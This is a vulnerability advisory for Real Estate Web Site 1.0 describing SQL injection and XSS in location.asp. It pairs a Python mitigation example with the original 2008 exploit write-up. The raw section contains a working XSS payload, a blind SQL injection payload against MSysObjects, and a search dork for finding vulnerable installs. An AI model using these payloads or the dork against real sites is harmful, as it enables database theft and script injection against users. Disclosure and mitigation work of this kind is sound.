Vendor: Real Estate Web Site
By: JosS
CVSS: 7.5 (HIGH)
Type: SQL Injection and Cross Site Scripting
CWE: 89, 79
Product Name: Real Estate Web Site
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:real-estate-website:real_estate_web_site
Year: 2008

Real Estate Web Site 1.0 (SQL/XSS) Multiple Remote Vulnerabilities

Real Estate Web Site 1.0 is vulnerable to multiple remote vulnerabilities, all in the file location.asp. By sending a specially crafted HTTP request to that file, an attacker can inject malicious SQL commands or execute arbitrary JavaScript code in the browser of an unsuspecting user. According to the advisory below, the name parameter is the cross-site scripting vector and the location parameter is the SQL injection vector.

Mitigation:

Input validation should be used to prevent SQL injection and Cross Site Scripting attacks.
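
Added example (not from the advisory or the vendor's code) showing the mitigation applied to the two parameters named in the advisory: allow-list validation plus a bound query parameter for location, and HTML output encoding for name. It is written in Python with an in-memory SQLite table; the table, the query and the function names are assumptions, since the source of location.asp is not shown here.

```python
import html
import re
import sqlite3

# Assumption: `location` is a numeric id; the real query in location.asp is not on the page.
LOCATION_RE = re.compile(r"[0-9]{1,9}")

# Values taken from the advisory's own examples (URL-decoded), used here as test input.
ADVISORY_NAME = "\"><script>alert('JosS')</script>"
ADVISORY_LOCATION = ("IIF((select mid(last(Name),1,1) from (select top 10 Namee "
                     "from MSysObjects))='a',0,'done')\x00")


def make_demo_db():
    """Constructed in-memory table standing in for the application's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE listings (location_id INTEGER, title TEXT)")
    db.executemany("INSERT INTO listings VALUES (?, ?)",
                   [(1, "Flat, city centre"), (2, "House with garden")])
    return db


def parse_location(raw):
    """Allow-list validation: a short run of ASCII digits, anything else is rejected."""
    if raw is None or not LOCATION_RE.fullmatch(raw):
        return None
    return int(raw)


def render_location_page(db, name, location):
    """Hypothetical hardened handler for the two parameters named in the advisory."""
    loc_id = parse_location(location)
    if loc_id is None:
        return 400, "<p>Invalid location.</p>"
    # Bound parameter: the value is passed separately and never spliced into the SQL text.
    rows = db.execute("SELECT title FROM listings WHERE location_id = ?",
                      (loc_id,)).fetchall()
    # Output encoding at the point of use: `name` is echoed into HTML, so escape it there.
    safe_name = html.escape(name or "", quote=True)
    items = "".join("<li>%s</li>" % html.escape(title) for (title,) in rows)
    return 200, "<h1>Listings for %s</h1><ul>%s</ul>" % (safe_name, items)


if __name__ == "__main__":
    db = make_demo_db()
    print(render_location_page(db, ADVISORY_NAME, "1"))
    print(render_location_page(db, "JosS", ADVISORY_LOCATION))
```

The same two controls apply in the application's own stack: bind the value as a query parameter instead of concatenating it, and HTML-encode anything echoed back into the page.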

Exploit-DB raw data:

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+           Real Estate Web Site 1.0 (SQL/XSS) Multiple Remote Vulnerabilities       +==--
--==+====================================================================================+==--
                          - dreaming of necessity is reason to comply -


[+] Info:

[~] Bug found by JosS
[~] sys-project[at]hotmail.com
[~] http://www.spanish-hackers.com
[~] EspSeC & Hack0wn!.

[~] Software: Real Estate Web Site 1.0
[~] HomePage: http://www.real-estate-website.org/
[~] Exploit: Multiple Remote Vulnerabilities [High]

[~] Dork: "powered by real-estate-website"

[+] Cross Site Scripting:

[~] Vuln file: location.asp
[~] Exploit: http://localhost/PATH/location.asp?name=[XSS]
[~] Example: http://localhost/PATH/location.asp?name="><script>alert('JosS')</script>

[+] Remote SQL Injection:

[~] Vuln file: location.asp
[~] Exploit: http://localhost/PATH/location.asp?name=JosS&location=[SQL]
[~] Example: IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Namee%20from%20MSysObjects))='a',0,'done')%00


--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+                                       JosS                                         +==--
--==+====================================================================================+==--
                                       [+] [The End]

# milw0rm.com [2008-06-09]